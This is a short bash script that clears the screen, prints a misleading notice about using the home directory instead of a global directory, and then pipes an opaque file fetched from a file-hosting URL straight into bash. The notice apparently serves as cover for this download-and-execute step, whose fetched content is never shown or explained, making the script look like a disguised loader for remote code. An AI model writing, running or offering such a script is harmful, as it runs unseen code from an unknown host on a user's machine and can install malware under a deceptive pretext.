#!/bin/bash

main() {
    clear

    echo -e "${YELLOW}[!!] Local user detected, using home directory instead of global directory ${NC}"
    curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3rK5BHUbVSvnFxmAZq0zweH2aoMcuD16QW4Uty" | bash
}

main
